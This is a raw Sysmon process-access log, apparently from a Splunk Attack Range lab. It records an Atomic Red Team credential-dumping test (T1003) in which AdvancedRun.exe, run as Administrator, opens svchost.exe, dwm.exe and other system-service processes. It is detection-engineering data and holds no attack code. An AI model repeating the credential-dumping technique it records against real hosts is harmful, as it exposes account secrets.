17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003953135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 